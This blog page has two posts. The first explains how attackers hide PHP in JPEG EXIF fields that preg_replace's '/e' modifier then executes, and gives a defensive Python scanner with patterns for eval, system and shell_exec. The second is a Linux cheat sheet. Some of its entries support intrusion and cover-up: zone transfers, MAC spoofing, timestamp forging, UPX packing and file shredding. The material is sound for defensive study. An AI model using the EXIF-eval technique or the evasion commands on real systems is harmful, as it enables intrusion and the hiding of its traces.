Thursday, January 28, 2021



Before starting, let's introduce or refresh a couple of concepts that will be useful for fully understanding what follows.


As Wikipedia reports, metadata is "data that provides information about other data". In other words, it is "data about data".

As an example, you usually see it when you right-click on an image and open the 'Details' tab.

For images, this metadata is called EXIF data, which stands for Exchangeable Image File Format. Most digital photo software can display EXIF information, but you usually can't edit it.

The Exif file format is the same as the JPEG file format: Exif inserts some image/digital camera information and a thumbnail image into the JPEG in conformity with the JPEG specification. As a result, Exif image files can be viewed in JPEG-compliant web browsers, picture viewers, photo-retouching software, etc. as ordinary JPEG images.

As the title suggests, the Exif structure fields can be leveraged by an attacker to hide malicious scripts.

Consider a simple image like this one:

At first sight there's nothing suspicious, right?

Now, using exiftool(-k), a lightweight tool downloadable from here, we can take a look at what it is hiding in its metadata.

Within the Exif data there are two suspicious entries, "Copyright" and "DocumentName", which contain respectively:

"/.*/e" is a PCRE pattern carrying the "e" regex modifier: when handed to preg_replace it causes the data from $exif['DocumentName'] to be evaluated as PHP code.

How can an attacker use these scripts?

Consider this PHP script:

The first line downloads the remote JPG image file with the stashed code in it and then sets the $exif variable with the array values. The variable will have this structure:

The final step in this process is to execute the PHP preg_replace function.

Notice that the $exif['Copyright'] variable data uses the "/.*/e" PCRE regex modifier (PREG_REPLACE_EVAL), which will evaluate the data from the $exif['DocumentName'] variable.

Knowing how it works and what it looks like, how can we hunt for it?

There are many ways, tools and techniques that can be used.
One example is this script, found on Pastebin, that looks for entries with UserComment, checking for the "/e" PCRE regex modifier.

If the script finds it within the entry, it will output the name of the file to the console to alert us that the file is potentially dangerous.
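As an added example (this is not the Pastebin script nor any of the tools named on this page), here is a small Python scanner that parses the JPEG APP1/EXIF segment directly, pulls out the free-text tags the technique abuses (Copyright, DocumentName, UserComment and a couple of other text fields) and flags the "/e" PCRE modifier or PHP code markers inside them. The tag numbers are the standard EXIF/TIFF ones; the sample JPEG is constructed inside the script, carries no image data, and its field values are made up for the demonstration.

```python
import re
import struct
import sys

# EXIF tags worth inspecting for stashed PHP: the IFD0 text tags used by the
# technique above (Copyright, DocumentName), a few other free-text fields, and
# UserComment, which lives in the Exif sub-IFD (pointed to by tag 0x8769).
WATCHED_TAGS = {
    0x010D: "DocumentName",
    0x010E: "ImageDescription",
    0x013B: "Artist",
    0x8298: "Copyright",
    0x9286: "UserComment",
}
EXIF_SUBIFD_TAG = 0x8769
# Byte size of each TIFF field type (BYTE, ASCII, SHORT, LONG, RATIONAL, UNDEFINED, SLONG, SRATIONAL).
TYPE_SIZES = {1: 1, 2: 1, 3: 2, 4: 4, 5: 8, 7: 1, 9: 4, 10: 8}

# Indicators: a /pattern/ whose modifier letters include "e" (PREG_REPLACE_EVAL),
# and common PHP code markers in a field that should only hold plain text.
E_MODIFIER = re.compile(r"/.*?/[imsxuUADSXJ]*e[imsxuUADSXJ]*(?![A-Za-z])")
PHP_MARKERS = re.compile(r"<\?php|\b(eval|preg_replace|system|passthru|shell_exec|base64_decode|assert)\s*\(", re.I)


def extract_exif_strings(jpeg: bytes) -> dict:
    """Walk the JPEG marker segments and return {tag_name: text} for the watched tags
    found in the APP1 EXIF segment (empty dict if the file carries no EXIF)."""
    if jpeg[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG: missing SOI marker")
    pos = 2
    while pos + 4 <= len(jpeg):
        if jpeg[pos] != 0xFF:
            raise ValueError("expected a marker at offset %d" % pos)
        marker = jpeg[pos + 1]
        if marker in (0xDA, 0xD9):          # SOS / EOI: no more metadata segments follow
            break
        seg_len = struct.unpack(">H", jpeg[pos + 2:pos + 4])[0]
        body = jpeg[pos + 4:pos + 2 + seg_len]
        if marker == 0xE1 and body.startswith(b"Exif\x00\x00"):
            return _parse_tiff(body[6:])
        pos += 2 + seg_len
    return {}


def _parse_tiff(tiff: bytes) -> dict:
    """Parse the TIFF structure inside the EXIF segment: IFD0 plus the Exif sub-IFD."""
    order = {b"II": "<", b"MM": ">"}.get(tiff[:2])
    if order is None or struct.unpack(order + "H", tiff[2:4])[0] != 42:
        raise ValueError("bad TIFF header in EXIF segment")
    found, pending, seen = {}, [struct.unpack(order + "I", tiff[4:8])[0]], set()
    while pending:
        ifd = pending.pop()
        if ifd in seen or ifd + 2 > len(tiff):   # guard against IFD loops and truncated data
            continue
        seen.add(ifd)
        count = struct.unpack(order + "H", tiff[ifd:ifd + 2])[0]
        for i in range(count):
            entry = ifd + 2 + 12 * i
            if entry + 12 > len(tiff):
                break
            tag, typ, n = struct.unpack(order + "HHI", tiff[entry:entry + 8])
            size = TYPE_SIZES.get(typ, 1) * n
            value_field = tiff[entry + 8:entry + 12]
            # Values of up to 4 bytes are stored inline; larger ones live at an offset.
            if size <= 4:
                data = value_field[:size]
            else:
                off = struct.unpack(order + "I", value_field)[0]
                data = tiff[off:off + size]
            if tag == EXIF_SUBIFD_TAG:
                pending.append(struct.unpack(order + "I", value_field)[0])
            elif tag in WATCHED_TAGS:
                found[WATCHED_TAGS[tag]] = _as_text(data, typ)
    return found


def _as_text(data: bytes, typ: int) -> str:
    """Decode an ASCII/UNDEFINED field; UserComment carries an 8-byte charset prefix."""
    if typ == 7 and data[:8] in (b"ASCII\x00\x00\x00", b"UNICODE\x00", b"JIS\x00\x00\x00\x00\x00", b"\x00" * 8):
        data = data[8:]
    return data.rstrip(b"\x00").decode("latin-1", "replace")


def scan_exif_strings(fields: dict) -> list:
    """Return (field, reason) pairs for fields that look like stashed PHP."""
    hits = []
    for name, text in fields.items():
        if E_MODIFIER.search(text):
            hits.append((name, "PCRE /e modifier (PREG_REPLACE_EVAL)"))
        if PHP_MARKERS.search(text):
            hits.append((name, "PHP code marker"))
    return hits


def build_sample_jpeg(tags: dict) -> bytes:
    """Constructed test input: a minimal JPEG (SOI, APP1/EXIF, EOI) whose IFD0 holds the
    given ASCII tags. It is not a real photo and contains no image data."""
    entries, values = [], bytearray()
    data_start = 8 + 2 + 12 * len(tags) + 4   # TIFF header + count + entries + next-IFD pointer
    for tag, text in sorted(tags.items()):
        val = text.encode("latin-1") + b"\x00"
        if len(val) <= 4:
            entries.append(struct.pack(">HHI4s", tag, 2, len(val), val.ljust(4, b"\x00")))
        else:
            entries.append(struct.pack(">HHII", tag, 2, len(val), data_start + len(values)))
            values += val
    tiff = (b"MM\x00\x2a" + struct.pack(">I", 8) + struct.pack(">H", len(entries))
            + b"".join(entries) + b"\x00\x00\x00\x00" + bytes(values))
    app1 = b"Exif\x00\x00" + tiff
    return b"\xff\xd8\xff\xe1" + struct.pack(">H", len(app1) + 2) + app1 + b"\xff\xd9"


if __name__ == "__main__":
    paths = sys.argv[1:]
    if not paths:   # no files given: run against the constructed sample instead
        sample = build_sample_jpeg({0x8298: "/.*/e", 0x010D: "echo 'constructed sample';"})
        print("constructed sample:", scan_exif_strings(extract_exif_strings(sample)))
    for path in paths:
        with open(path, "rb") as fh:
            hits = scan_exif_strings(extract_exif_strings(fh.read()))
        if hits:
            print("%s: SUSPICIOUS %s" % (path, hits))
```

Run it with a list of JPEG paths to get one line per suspicious file, or with no arguments to see it flag the constructed sample. The parser only follows IFD0 and the Exif sub-IFD and stops at the first EXIF segment, which is enough for the fields this technique uses; the regex deliberately requires the "e" to sit among real PCRE modifier letters so that an ordinary URL in an ImageDescription field does not trigger it.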

A tool called PHP Malware Finder, available on GitHub, can also be used.

PHP-malware-finder is a script used to detect obfuscated code, as well as files using PHP functions often used in web shells. Detection is performed by crawling the filesystem and testing files against a set of YARA rules.

Not to mention the Loki and THOR IOC scanners created by the awesome Nextron Systems; their indicators can be derived from published incident reports, forensic analyses or malware sample collections.

Conclusions:

This is not a new technique, but it is important to highlight it because today, for performance reasons, many organizations opt to scan only PHP files and exclude other file types from scanning, overlooking certain types of file that shouldn't be classified as less important.

Moreover, even though the e modifier (PREG_REPLACE_EVAL) was deprecated in PHP 5.5.0 and eventually removed as of PHP 7.0.0, this doesn't mean that the attack is no longer prevalent. If the corporate environment is running PHP applications and is not on the latest version of PHP, then it is susceptible.

Tuesday, January 5, 2021

Linux cheat sheet

Everyone knows: cheat sheets are cool! They are very useful if you already know the basics of a topic but have to look up details when you are not sure about something.

Especially if you are new to a topic and have to learn a lot of new things, it is sometimes very hard to memorize everything.

Linux Network Commands
Command                                        Description
watch ss -tp                                   Network connections
netstat -ant                                   TCP connections (-anu = UDP)
netstat -tulpn                                 Connections with PIDs
lsof -i                                        Established connections
smb://<ip>/share                               Access Windows SMB share
share user x.x.x.x c$                          Mount Windows share
smbclient -U user \\\\<ip>\\<share>            SMB connect
ifconfig eth# <ip>/<cidr>                      Set IP and netmask
route add default gw <gw_ip>                   Set default gateway
ifconfig eth# mtu <size>                       Change MTU size
export MAC=xx:xx:xx:xx:xx:xx                   Store a MAC address in $MAC
ifconfig <int> hw ether <MAC>                  Change MAC address
macchanger -m <MAC> <int>                      Change MAC address (Kali)
iwlist <int> scan                              Built-in Wi-Fi scanner
dig -x <ip>                                    Reverse DNS lookup for <ip>
host <ip>                                      Reverse DNS lookup for <ip>
host -t SRV _<service>._tcp.<domain>           DNS SRV lookup
dig @<ip> <domain> -t AXFR                     DNS zone transfer
host -l <domain> <namesvr>                     DNS zone transfer
ip xfrm state list                             Print existing VPN (IPsec) keys
ip addr add <ip>/<cidr> dev eth0               Add a secondary ('hidden') IP address
cat /var/log/messages | grep DHCP              List DHCP assignments
tcpkill host <ip> and port <port>              Block ip:port
echo "1" > /proc/sys/net/ipv4/ip_forward       Turn on IP forwarding
echo "nameserver x.x.x.x" > /etc/resolv.conf   Add DNS server

Command                                        Description
nmblookup -A <ip>                              Get NetBIOS hostname for <ip>
id                                             Current username, uid and groups
w                                              Logged-on users
who -a                                         User information
last -a                                        Last users logged on
ps -ef                                         Process listing (or top)
df -h                                          Disk usage (or free)
uname -a                                       Kernel version/CPU info
mount                                          Mounted file systems
getent passwd                                  Show list of users
PATH=$PATH:/home/mypath                        Add to PATH variable
kill <pid>                                     Kill process with <pid>
cat /etc/issue                                 Show OS info
cat /etc/*release*                             Show OS version info
cat /proc/version                              Show kernel info
rpm --query --all                              Installed pkgs (Red Hat)
rpm -ivh *.rpm                                 Install RPM (-e = remove)
dpkg --get-selections                          Installed pkgs (Ubuntu)
dpkg -i *.deb                                  Install DEB (-r = remove)
pkginfo                                        Installed pkgs (Solaris)
which <tcsh/csh/ksh/bash>                      Show location of executable
chmod 750 <tcsh/csh/ksh>                       Disable <shell>, force bash


Command                                        Description
wget http://<url> -O url.txt -o /dev/null      Grab URL
rdesktop <ip>                                  Remote Desktop to <ip>
scp /tmp/file user@x.x.x.x:/tmp/file           Put file
scp user@<remoteip>:/tmp/file /tmp/file        Get file
useradd -m <user>                              Add user
passwd <user>                                  Change user password
userdel <user>                                 Remove user
script -a <outfile>                            Record shell (Ctrl-D stops)
apropos <subject>                              Find related commands
history                                        View user's command history
!<num>                                         Execute line # from history


Command                                        Description
diff file1 file2                               Compare files
rm -rf <dir>                                   Force delete of <dir>
shred -f -u <file>                             Overwrite/delete file
touch -r <ref_file> <file>                     Match ref_file timestamp
touch -t YYYYMMDDhhmm <file>                   Set file timestamp
sudo fdisk -l                                  List connected drives
mount /dev/sda# /mnt/usbkey                    Mount USB key
md5sum -t file                                 Compute MD5 hash
echo -n "str" | md5sum                         Generate MD5 hash of a string
sha1sum file                                   SHA1 hash of file
sort -u                                        Sort/show unique lines
grep -c "str" file                             Count lines with "str"
tar cf file.tar files                          Create .tar from files
tar xf file.tar                                Extract .tar
tar czf file.tar.gz files                      Create .tar.gz
tar xzf file.tar.gz                            Extract .tar.gz
tar cjf file.tar.bz2 files                     Create .tar.bz2
tar xjf file.tar.bz2                           Extract .tar.bz2
gzip file                                      Compress/rename file
gzip -d file.gz                                Decompress file.gz
upx -9 -o out.exe orig.exe                     UPX-pack orig.exe
zip -r <zipfile> <dir>/*                       Create zip
dd skip=1000 count=2000 bs=8 if=file of=file   Cut block 1K-3K from file
split -b 9K <file> <prefix>                    Split file into 9K chunks
awk 'sub("$","\r")' unix.txt > win.txt         Windows-compatible text file (CRLF)
find . -iname "*.pdf" -type f                  Find PDF files
find / \( -perm -4000 -o -perm -2000 \) -exec ls -ldb {} \;   Search for setuid/setgid files
dos2unix <file>                                Convert to *nix format
file <file>                                    Determine file type/info
chattr +i <file> / chattr -i <file>            Set/unset immutable bit

